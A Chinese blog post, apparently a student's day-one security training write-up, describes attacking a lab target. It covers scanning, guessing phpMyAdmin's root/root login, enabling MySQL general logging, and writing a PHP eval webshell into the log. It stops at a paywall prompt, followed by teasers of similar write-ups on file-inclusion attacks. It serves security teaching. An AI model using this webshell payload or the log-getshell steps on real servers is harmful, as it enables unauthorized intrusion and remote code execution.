实训Day-1 漏洞攻击实战

实训Day-1：漏洞攻击实战全解析

最新推荐文章于 2025-12-04 18:10:26 发布

原创

最新推荐文章于 2025-12-04 18:10:26 发布 · 888 阅读

9 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #web安全 #网络

今天的实训目的是为了：了解漏洞攻击的一般步骤；掌握SQL注入的基本原理；掌握XSS攻击的基本原理；掌握文件上传的基本原理；掌握文件包含的基本原理；能根据漏洞原理展开攻击。

实训任务1 漏洞攻击实战一

1.打开之后我们先用御剑对这个靶机站点进行扫描

2.可以发现可疑地址phpmyadmin/index.php

3.这里发现了数据库的登录地址，我们弱口令爆破一下得到用户名和密码都是root

4.进数据库之后先查看是否开启日志功能以及日志文件的保存路径，若未开启将其开启

可以利用sql语句
“SHOW VARIABLES LIKE 'general%'”
“set global general_log = "ON";”

5.向日志中写入一句话木马“select ‘<?php @eval($_POST[1]);?>’”

6.寻找网站在服务器上的绝对地址，由于在linux中mysql数据库的日志与web目录的用户权限是分开的，我们此时还无法通过目录地址访问该日志文件
再次查看我们御剑扫描的后台，发现info.php这里应该存放着各种的版本信息等

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

likfishdn

关注关注

10
点赞
踩
9

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

实训周---Day1 漏洞攻击实战

achiyyds的博客

04-21

987

记录实训周的日常。

实训Day-2 流量分析与安全杂项

likfishdn的博客

04-22

1097

掌握文件分析的基本方法。5.在tpl_manage 页面有一个 POST 请求，追踪该请求的 http 流，观察提交的内容和响应的内容。发现并不在我们要的flag，这些时因该思考是否存存在其他问题，再结合题目我们猜测可能在数据包中，在仔细查看数据包的二进制文件后发现了里面存在一个zip的压缩包，我们将其保存出来。1.筛选http数据包，发现前面的是正常的，在345开始出现大量head请求和404响应，由此我们可以判断出，192.168.177.1 这个 IP 在对网站进行目录爆破。掌握文件分析的基本方法。

参与评论您还未登录，请先登录后发表或查看评论

实训Day1-漏洞攻击实战

qq_75009257的博客

04-21

921

第一天实训课直接下发了五个任务，感觉收获颇丰。

Day-1 漏洞攻击实战

2301_78007327的博客

04-25

861

通过本次漏洞攻击实战实训，我系统掌握了SQL注入、文件上传、文件包含等常见Web漏洞的利用方法与防御策略。实训中，从MySQL日志Getshell到phpMyAdmin漏洞利用，我深刻体会到安全漏洞的危害性及防护的重要性。特别是在构造攻击链、绕过过滤机制的过程中，反向强化了我的安全防御意识。这次实训不仅提升了我的渗透测试技能，更让我认识到安全是一个需要持续关注的系统工程，开发中必须贯彻最小权限、输入验证等安全原则。这些实践经验将为我的职业发展奠定坚实基础。

漏洞攻击实战实训day1

2302_78574538的博客

04-23

657

通过 php 探针的信息，判断出该站点使用phpstudy 搭建，因为使用 phpstudy 搭建的站点默认存在该探针文件。4.根据上传zip返回绝对路径和文件包含这2点，我们可以通过上传一个有php脚本的zip文件并且包含他来获取信息. 我们将一个文件内容为的php文件打包成一个zip压缩包。查看具体原因发现是因为程序自身会在后面加上.php，注意，在包含文件的时候%23表示#，如果直接使用#，浏览器会不编码，且把#以后的字符当做锚点，请求的时候不会带上#以后的字符。

实训day1漏洞攻击实战总结

qq_39794376的博客

04-21

129

可以发现两个重要的web：info.php和phpmyadmin,点击phpmyadmin跳转到登陆界面，账号密码为root root，进入网站数据库，点击sql，输入任务要求命令开启日志功能，并寻找到绝对路径，然后根据任务要求执行指定命令。可以参考网络课的实验8，通过输入特殊字符发现该网站是使用了javascript阻拦提交特殊自符，所以关闭网站的javascript权限，然后构造字符串获取到表名，表数据，然后查到flag。实训任务1 漏洞攻击实战一。实训任务2漏洞攻击实战二。实训任务3 白云新闻搜索。

信息安全实训Day1-漏洞攻击实战心得体会

2401_83518013的博客

04-21

248

用工具扫描 Web 站点收集信息，在寻找数据库连接地址和密码时，需要仔细分析可疑端口与文件。利用日志文件 getshell 的过程，让我对数据库日志功能、权限设置以及文件操作有了深入理解。网络安全领域技术不断更新，漏洞层出不穷，我要先学会这些知识，才能更好的保护网络安全。因为在Linux中，MySQL数据库的日志和web目录的用户权限是分开的。在 SQL 注入相关的实训任务里，按照步骤过滤、破解并进行注入操作，深刻体会到 SQL 注入漏洞的原理与危害。，我收获颇丰，对网络安全领域有了更为深刻且全面的认知。

信息安全专业实训Day-1（漏洞攻击实战）

2405_86096835的博客

04-21

877

在数字化浪潮席卷全球的今天，信息安全的重要性日益凸显。在信息安全专业实训的第一天，我们通过漏洞攻击的学习，掌握了多方面的知识和技能，这些内容不仅让我们理解了漏洞如何被利用，以及攻击对系统、数据安全的潜在威胁。并且掌握了如何发现和修复漏洞，从而提升系统的整体安全性。下面我将详细介绍Day-1的实训内容。

信息安全实训日志——Day1漏洞攻击实战

2201_75338176的博客

04-21

1748

但在实训中也遇到一些问题，如部分漏洞需要反复调试，后续应加强对细节的把握和对不同环境下漏洞利用的学习。文件上传：用户上传可执行脚本文件获取服务器命令执行权，需满足文件可执行、可访问且未被安全处理等条件，可通过结合多种文件类型判断方式等措施防范。文件包含：程序开发中引入文件的技术，若对引入文件变量校验不足会引发安全漏洞，可通过过滤用户输入等方式防范。版本的文件包含漏洞，可利用路径穿越符绕过目录限制，实现敏感文件读取或恶意代码执行。文件上传：结合文件上传和文件包含漏洞，利用。寻找网站在浏览器上的绝对地址。

实训Day8 docker RCE漏洞

m0_65590325的博客

09-07

934

实训内容

信息安全毕业实训实习-Day3

m0_67446464的博客

08-29

827

xray 为单文件二进制文件，无依赖，也无需安装，下载后直接使用xray 跨平台支持，请下载时选择需要的版本下载。注意：不要直接 clone 仓库，xray 并不开源，仓库内不含源代码，直接下载构建的二进制文件即可。

冬季安全用电监测案例

Jima_的博客

12-03

561

本文介绍了一套针对工厂宿舍用电安全的智能监测系统。系统通过安装DAM-E3501NT采集模块，实时监测各宿舍的用电参数和环境温度，并通过以太网将数据传输至主控室。系统具备高精度测量（0.2%）、过载预警、阈值自动告警等功能，当检测到异常用电（如持续1小时功率＞3kW）时可自动报警。该系统采用"感知-分析-预警-控制"的闭环架构，实现从被动防范到主动监测的转变，适用于工厂、教育机构等多种场所的用电安全管理。

智能巡检系统：智能化管理的安全守护者

Guheyunyi的博客

12-03

430

传统的巡检工作主要依赖人工完成，这种方式存在着多重挑战：首先，人工巡检的效率有限，难以实现全天候、全方位的覆盖；最重要的是，在一些危险作业环境中，巡检人员的人身安全难以得到充分保障。智能巡检系统代表着安全管理的发展方向。在工业园区，系统能够对生产设备进行全方位监控，及时发现异常状况，确保生产安全。在数字化转型的浪潮中，智能巡检系统正成为越来越多企业的优先选择，帮助他们在激烈的市场竞争中赢得先机。传统的巡检方式虽然在一定程度上保障了运营安全，但随着企业规模的扩大和设备复杂度的提升，其局限性也日益凸显。

视频直播点播平台EasyDSS构建安全高效的医疗培训直播新体系

音视频流媒体技术

12-02

322

医疗培训的数字化转型不是简单的技术应用，而是医疗教育模式的深刻变革。

软件供应链安全“黑洞”：2025安全合规的制品库如何选择？

weixin_44552837的博客

12-01

383

软件供应链攻击频发，依赖组件不可控、流转管控缺失等问题凸显制品管理风险，制品库亟需安全合规的产品选择。国产制品管理平台可构建全生命周期防御体系，以可信源建设、上传即扫描、全链路追溯及信创适配筑牢防线，是企业研发制品仓库的选型优选。

阿里云渠道商：文件和数据放在云端安全吗？

TG_yilong_cloud的博客

12-04

436

云端存储相比本地存储具有显著安全优势：采用军事级AES-256加密、三重备份机制和异地容灾，实现99.999999999%数据持久性；专业团队7×24小时运维，威胁响应速度提升100倍；通过ISO27001等20+项认证，使企业数据泄露风险从15%降至0.5%，个人隐私泄露风险降低20倍。云端在物理防护、加密强度、合规成本等方面均优于本地存储50-100倍，且年度安全投入可节省90%，是数字化转型时代更可靠的数据安全选择。

5.14、AI安全运维体系：构建企业级的“安全超脑”

骥龙信息的博客

12-02

546

未来的企业安全体系将呈现三个趋势： 1. AI 驱动，而非规则驱动 2. 自动化处理，而非人工疲于响应 3. 预测性防御，而非事后补救 AI 不是为了取代安全人员，而是让安全团队具备“超能力”。

SSH 深度实战：从基础到高级安全配置

1024

11-30

563

本文全面介绍了 SSH 协议的核心技术与安全实践。主要内容包括：SSH 基础连接与密钥认证管理（RSA/ECDSA/ED25519 密钥生成与分发）；服务器端安全配置（端口更改、root 登录禁用、Fail2Ban 防护）；高级功能如端口转发（本地/远程/SOCKS 代理）、连接复用和代理转发；以及安全的文件传输方法（SCP/SFTP）。

iOS App 混淆的真实世界指南，从构建到成品 IPA 的安全链路重塑